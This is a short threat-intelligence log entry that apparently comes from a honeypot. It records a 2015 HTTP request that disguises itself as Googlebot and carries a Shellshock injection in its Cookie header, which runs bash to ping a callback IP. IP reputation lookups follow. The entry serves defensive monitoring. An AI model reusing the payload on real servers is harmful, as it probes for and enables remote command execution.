Samstag, 24. Oktober 2015

185.93.185.47 - Shellsock ping to 212.47.238.143

BEGIN OF HTTP DATA:
2015-10-23 22:18:50
Source IP: 185.93.185.47
Country: UA RiskScore: 10 Malware: []
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close

212.47.238[.]143

    Static Source: GeoIP data
  • Country: France
  • ASN: AS12876 ONLINE S.A.S.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/212.47.238.143

Feed search for 212.47.238[.]143

185.93.185[.]47

    Static Source: GeoIP data
  • Country: Ukraine
  • ASN: AS204209 Individual entrepreneur Tereschenko Marina Evgenievna
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.93.185.47
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/185.93.185.47

Feed search for 185.93.185[.]47